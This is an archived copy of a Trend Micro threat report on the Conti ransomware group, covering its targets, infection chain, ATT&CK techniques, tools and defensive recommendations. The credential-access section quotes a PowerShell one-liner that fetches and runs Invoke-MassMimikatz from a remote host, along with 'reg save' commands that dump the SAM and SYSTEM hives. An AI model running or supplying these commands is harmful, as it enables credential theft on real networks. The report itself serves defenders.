{
	"id": "c4b55d9d-a1ca-4af5-8911-a9d9bf672d4e",
	"created_at": "2026-04-06T00:10:15.852379Z",
	"updated_at": "2026-04-10T03:19:57.002821Z",
	"deleted_at": null,
	"sha1_hash": "6b451fba6a32b5671a1c41cb61199d1358054446",
	"title": "Ransomware Spotlight: Conti",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 261328,
	"plain_text": "Ransomware Spotlight: Conti\r\nArchived: 2026-04-05 15:06:45 UTC\r\nTop affected industries and counties\r\nConti attacks have been detected all over the globe, with the US amassing over a million attack attempts from January 1 to\r\nNovember 12, 2021. The Netherlands and Taiwan ranked second and third respectively.\r\nopen on a new tab\r\nFigure 1. Countries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)\r\nSource: Trend Micro™ Smart Protection Network™ infrastructure\r\nThe retail industry saw the most Conti attack attempts, followed by insurance, manufacturing, and telecommunications.\r\nHealthcare, which Conti operators targeted in high-profile attacksopen on a new tab this year, is sixth on the list.\r\nopen on a new tab\r\nFigure 2. Industries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)\r\nSource: Trend Micro™ Smart Protection Network™ infrastructure\r\nInfection chain and techniques\r\nInitial Access\r\nConti can arrive in the system through BazarLoader, which is delivered via phishing emails containing a Google\r\nDrive link that downloads the malware.\r\nAlternatively, the ransomware can arrive via exploiting the the FortiGate firewall vulnerabilities CVE-2018-\r\n13379open on a new tab and CVE-2018-13374open on a new tab. After successfully exploiting the application, the\r\nransomware deploys Cobalt Strike to gain a foothold on the system.\r\nConti can also arrive as a result of the exploitation of the ProxyShell Microsoft Exchange vulnerabilities.\r\nDiscovery\r\nFor initial reconnaissance, the Conti group uses tools such as Whoami, Nltest, and Net. These tools give the operators\r\ninformation about where they are in the system, and what rights and permissions they have.\r\nSince the operators employ double extortion tacticsnews- cybercrime-and-digital-threats, they actively look for files\r\nto exfiltrate in the discovery stage. The threat actors use tools such as ShareFinder to identify the shares needed for\r\nexfiltration and ransomware deployment.\r\nPrivilege Escalation\r\nAlthough the group mostly relies on finding the domain admin credentials to gain full access to the domain, they may\r\nalso use a couple of exploits like Zerologon (CVE-2020-1472open on a new tab) and PrintNightmare (CVE-2021-\r\n1675open on a new tab), to elevate their privilege and further strengthen their foothold in the network.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti\r\nPage 1 of 6\n\nCredential Access\r\nThe attackers dump cached credentials on systems to allow them to move laterally or elevate their privilege. They use\r\ntools such as ProcDump to dump system process/es (usually lssas.exe) and use it in combination with Mimikatz to\r\ndump credentials.\r\nIn other cases, they may use mass-mimikatz, a module from Empire, to dump the credentials on multiple systems.\r\nMimikatz (mass-mimikatz, from Empire)\r\nC:\\WINDOWS\\SYSTEM32\\WBEM\\WMIC.exe /node:localhost process call create powershell /c IEX\r\n(NewObjectNet.WebClient).DownloadString('https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/Invo\r\nMassMimikatz.ps1');'24346D,COMPUTERNAME2'|Invoke-MassMimikatz -Verbose \u003e c:/programdata/2.txt\r\nAlternatively, they may also use the kerberoasting module of the PowerShell empire or use tools like Rubeus.\r\nThe attackers may also use native Windows tools, such as Task Manager, to dump the memory of lsass or use the\r\ncomsvcs DLL file’s MiniDump function.\r\nThey also gain access to the credentials by taking them out of password stores.\r\nOne of the ways to do this is through “reg save” commands.\r\n- reg save HKLM\\SAM C:\\programdata\\SamBkup.hiv\r\n- reg save HKLM\\SYSTEM C:\\programdata\\FileName.hiv\r\nThey can also use tools such as Get-GPPPassword to get plain text passwords stored in the group policy\r\npreference\r\nThey can also gain credentials from browsers and cloud applications using tools such as SharpChrome and SeatBelt.\r\nAfter gaining enough credentials, they use SMBAutoBrute to automate the task of bruteforcing the passwords and\r\nsee what password works.\r\nAfter gaining information on the domain accounts, the attackers then dump the domain controller credentials using\r\nNtdsutil.\r\nAlternatively, they can also use Vssadmin to create a snapshot of the system and download Ntds.dit to accomplish\r\nthis.\r\nLateral Movement\r\nThe attackers can also use batch files to disable security tools. These files are executed through scheduled tasks.\r\nThe groups are also known to use third-party tools such as Atera and AnyDesk to control remote systems.\r\nThe operators are also known to use EternalBlue to move laterally in the network of systems that are vulnerable to\r\nthis exploit.\r\nThey also use PSExec to remotely execute scripts and the ransomware itself.\r\nDefense Evasion\r\nJust before the execution of the ransomware, threat actors create a series of batch files to automate the distribution of\r\nits tools in the domain. These tools include scripts to terminate existing security software.\r\nThe operators can also use other tools, like GMER, PC Hunter, and PowerShell, to accomplish this.\r\nExecution\r\nTies to the Trickbot gang gave Conti operators the ability to execute the ransomware via BazarLoader, which leads to\r\nCobalt Strike, which eventually leads to the ransomware itself.\r\nOnce the actors are inside the network, they tend to use scheduled tasks and batch files as a means of execution on\r\nremote systems.\r\nAlternatively, to execute the ransomware the operators can use files such as the DontSleep.exe process, which calls\r\nthe task manager where the file can be executed.\r\nExfiltration\r\nThe attackers perform data exfiltration on the system with the use of the Rclone tool, which is an open-source tool\r\nused for syncing files to a specified cloud storage, such as Mega cloud storage.\r\nThe group can also use WinSCP to exfiltrate data.\r\nImpact\r\nAfter exfiltration and distribution of the ransomware to the targeted endpoints, the files are now encrypted using\r\nChaCha20 with RSA4096 to protect the ChaCha key and nonce.\r\nThe ransomware also inhibits system recovery by deleting shadow copies using WMI.\r\nMITRE tactics and techniques\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti\r\nPage 2 of 6\n\nInitial\r\nAccess\r\nExecution Persistence\r\nPrivilege\r\nEscalation\r\nCredential\r\nAccess\r\nLateral\r\nMovement\r\nDefense Evasion\r\nCommand\r\nand Control\r\nE\r\nT1566 -\r\nPhishing\r\nArrives via\r\nphishing\r\nemails with\r\nBazarLoader\r\nT1190 -\r\nExploit\r\npublic-facing\r\napplication\r\nArrives via\r\nfirewall\r\nexploits\r\n(CVE-2018-\r\n13379 and\r\nCVE-2018-\r\n13374)\r\nT1106 -\r\nExecution\r\nthrough API\r\nUses native\r\nAPI to execute\r\ncommands\r\nsuch as\r\ndeleting\r\nshadow copies\r\nT1059.003 -\r\nCommand and\r\nscripting\r\ninterpreter:\r\nWindows\r\ncommand shell\r\nUses batch files\r\nto distribute\r\nand execute\r\nransomware\r\nT1047 -\r\nWindows\r\nManagement\r\nInstrumentation\r\nUses WMI to\r\nexecute batch\r\nfiles and delete\r\nshadow copies\r\nT1204 - User\r\nexecution\r\nUser execution\r\nis needed to\r\ncarry out the\r\npayload from\r\nthe spear\r\nphishing link\r\nT1053.005 -\r\nScheduled\r\ntask/job:\r\nscheduled task\r\nUses scheduled\r\ntasks as a\r\nmeans of\r\nexecution for\r\nthe\r\nransomware\r\nT1053.005\r\n- Scheduled\r\ntask/job:\r\nScheduled\r\ntask\r\nUses\r\nscheduled\r\ntasks as a\r\nmeans of\r\nexecution\r\nfor the\r\nransomware\r\nT1078.002 -\r\nValid\r\naccounts:\r\ndomain\r\naccounts\r\nUses domain\r\nadministrator\r\naccounts to\r\nescalate\r\nprivilege in\r\nthe system\r\nT1083 - File\r\nand directory\r\ndiscovery\r\nSearches for\r\nspecific files\r\nand directory\r\nrelated to its\r\nencryption\r\nT1018 -\r\n Remote\r\nsystem\r\ndiscovery\r\nEnumerates\r\nARP entries to\r\nenable\r\ndistribution to\r\nremote systems\r\nT1057 -\r\nProcess\r\ndiscovery\r\nDiscovers\r\ncertain\r\nprocesses for\r\nprocess\r\ntermination\r\nT1016 -\r\n System\r\nnetwork\r\nconfiguration\r\ndiscovery\r\nEnumerates\r\nARP entries to\r\nenable\r\ndistribution to\r\nremote systems\r\nT1069.002 -\r\n Permission\r\ngroups\r\ndiscovery:\r\ndomain groups\r\nSearches for\r\ngroup\r\ninformation\r\nfor privilege\r\nescalation\r\nT1003 - OS\r\ncredential\r\ndumping\r\nDumps LSASS\r\nmemory to be\r\nused for\r\nretrieving\r\npassword\r\nhashes\r\nT1555 -\r\nCredentials\r\nfrom\r\npassword\r\nstores\r\nExtracts\r\npasswords\r\nfrom\r\ncredential\r\nstores using\r\ntools such as\r\nSharpChrome,\r\nSeatbelt, and\r\nnet-GPPPassword\r\nT1552 -\r\nUnsecured\r\ncredentials\r\nRetrieves\r\ncredentials\r\nusing\r\nMimikatz \r\nT1570 -\r\nLateral tool\r\ntransfer\r\nUses\r\nBITSAdmin to\r\ntransfer tools\r\nacross the\r\nnetwork\r\nT1021.002 -\r\nRemote\r\nservices:\r\nSMB/Windows\r\nadmin shares\r\nCobalt Strike\r\nuses admin\r\nshares to\r\ndistribute itself\r\nto remote\r\nsystems\r\nT1562.001 - Impair\r\ndefenses: disable or\r\nmodify tools\r\nTerminates certain\r\nsecurity related\r\nsoftware\r\nT1140 -\r\nDeobfuscate/Decode\r\nfiles or information\r\nRansomware is\r\nobfuscated to make\r\ndetection more\r\ndifficult\r\nT1055 - Process\r\ninjection\r\nUses process\r\ninjection to make\r\ndetection more\r\ndifficult\r\nT1071 -\r\nApplication\r\nLayer\r\nProtocol\r\nUses http to\r\ncommunicate\r\nto its C\u0026C\r\nserver\r\nT1219 -\r\nRemote\r\naccess\r\nsoftware\r\nUses RMM\r\nsoftware\r\nsuch as\r\nAnyDesk and\r\nAtera\r\nT\r\nE\r\no\r\nse\r\nex\r\nto\r\nst\r\nSy\r\nto\r\nsp\r\nc\r\nst\r\nsu\r\nM\r\nst\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti\r\nPage 3 of 6\n\nInitial\r\nAccess\r\nExecution Persistence\r\nPrivilege\r\nEscalation\r\nCredential\r\nAccess\r\nLateral\r\nMovement\r\nDefense Evasion\r\nCommand\r\nand Control\r\nE\r\nT1082 -\r\n System\r\ninformation\r\ndiscovery\r\nLogs system\r\ninformation\r\nfor\r\ninformation on\r\nthe system\r\nT1033 -\r\nSystem\r\nowner/user\r\ndiscovery\r\nPerforms user\r\ndiscovery for\r\nprivilege\r\nescalation\r\nT1012 - Query\r\nregistry\r\nQueries\r\ncertain\r\nregistry for\r\nstored\r\npasswords\r\nT1063 -\r\nSecurity\r\nsoftware\r\ndiscovery\r\nDiscovers\r\nsecurity\r\nsoftware for\r\nreconnaissance\r\nand\r\ntermination\r\nSummary of malware, tools, and exploits used\r\nSecurity teams can watch out for the presence of the following malware tools, and exploits that are typically used in Conti\r\nattacks:\r\nInitial Entry Execution Discovery Privilege Escalation Credential Access\r\nLateral\r\nMovement\r\nDefen\r\nPhishing\r\nemails\r\nFirewall\r\nexploits\r\n(CVE-2018-\r\n13379\r\nand\r\nCVE-2018-\r\n13374)\r\nBazarLoader/\r\nBazarBackdoor\r\nCobalt Strike\r\nDontSleep\r\nAdfind\r\nNet\r\nNetScan\r\nNltest\r\nShareFinder\r\nSharpView\r\nPowerUpSQL\r\nWhoami\r\nEternalBlue\r\n(Ms17_010)\r\nMimikatz\r\nPowerUpSQL\r\nPrintNightmare\r\n(CVE-2021-\r\n1675)\r\nRouterScan\r\nZerologon\r\n(CVE-2020-\r\n1472)\r\nEComsvcs.dll\r\nMimikatz\r\nNet-GPPPassword\r\nNtdsutil\r\nPowerShell\r\nEmpire:\r\nKerberoast\r\nProcDump\r\nRouterScan\r\nRubeus\r\nSharpChrome\r\nSMB\r\nAutoBrute\r\nAnyDesk\r\nAtera\r\nBITSAdmin\r\nCobalt\r\nStrike\r\nEternalBlue\r\nMimikatz\r\nPsExec\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti\r\nPage 4 of 6\n\nInitial Entry Execution Discovery Privilege Escalation Credential Access\r\nLateral\r\nMovement\r\nDefen\r\nTask\r\nManager\r\nVssadmin\r\nRecommendations\r\nTo help defend systems against similar threats, organizations can establish security frameworks, which can allocate\r\nresources systematically for establishing a solid defense against ransomware.\r\nHere are some best practices that can be included in these frameworks:\r\nAudit and inventory\r\nTake an inventory of assets and data\r\nIdentify authorized and unauthorized devices and software\r\nMake an audit of event and incident logs\r\nConfigure and monitor\r\nManage hardware and software configurations\r\nGrant admin privileges and access only when necessary to an employee’s role\r\nMonitor network ports, protocols, and services\r\nActivate security configurations on network infrastructure devices such as firewalls and routers\r\nEstablish a software allow list that only executes legitimate applications\r\nPatch and update\r\nConduct regular vulnerability assessments\r\nPerform patching or virtual patching for operating systems and applications\r\nUpdate software and applications to their latest versions\r\nProtect and recover\r\nImplement data protection, backup, and recovery measures\r\nEnable multifactor authentication\r\nSecure and defend\r\nEmploy sandbox analysis for blocking malicious emails\r\nDeploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and\r\nnetwork\r\nDetect early signs of an attack such as the presence of suspicious toolsnews- cybercrime-and-digital-threats in the\r\nsystem\r\nUse advanced detection technologies such as those powered by AI and machine learning\r\nTrain and test\r\nRegularly train and assess employees on security skills\r\nDo red-team exercises and penetration tests\r\nA multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and\r\nnetwork). Security solutions can detect malicious components and suspicious behavior could help protect enterprises.\r\nTrend Micro Vision One™products provides multilayered protection and behavior detection, which helps block\r\nquestionable behavior and tools early on before the ransomware can do irreversible damage to the system.\r\nTrend Micro Cloud One™ Workload Securityproducts protects systems against both known and unknown threats that\r\nexploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine\r\nlearning. \r\nTrend Micro™ Deep Discovery™ Email Inspectorproducts employs custom sandboxing and advanced analysis\r\ntechniques to effectively block malicious emails, including phishing emails that can serve as entry points for\r\nransomware.\r\nTrend Micro Apex One™products offers next-level automated threat detection and response against advanced\r\nconcerns such as fileless threats and ransomware, ensuring the protection of endpoints.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti\r\nPage 5 of 6\n\nIndicators of Compromise\r\nHIDE\r\nLike it? Add this infographic to your site:\r\n1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page\r\n(Ctrl+V).\r\nImage will appear the same size as you see above.\r\nWe Recommend\r\nThe Industrialization of Botnets: Automation and Scale as a New Threat Infrastructurenews article\r\nComplexity and Visibility Gaps in Power Automatenews article\r\nCracking the Isolation: Novel Docker Desktop VM Escape Techniques Under WSL2news article\r\nAzure Control Plane Threat Detection With TrendAI Vision One™news article\r\nThe AI-fication of Cyberthreats: Trend Micro Security Predictions for 2026predictions\r\nRansomware Spotlight: DragonForcenews article\r\nStay Ahead of AI Threats: Secure LLM Applications With Trend Vision Onenews article\r\nThe Road to Agentic AI: Navigating Architecture, Threats, and Solutionsnews article\r\nSource: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti"
	],
	"report_names": [
		"ransomware-spotlight-conti"
	],
	"threat_actors": [],
	"ts_created_at": 1775434215,
	"ts_updated_at": 1775791197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6b451fba6a32b5671a1c41cb61199d1358054446.pdf",
		"text": "https://archive.orkl.eu/6b451fba6a32b5671a1c41cb61199d1358054446.txt",
		"img": "https://archive.orkl.eu/6b451fba6a32b5671a1c41cb61199d1358054446.jpg"
	}
}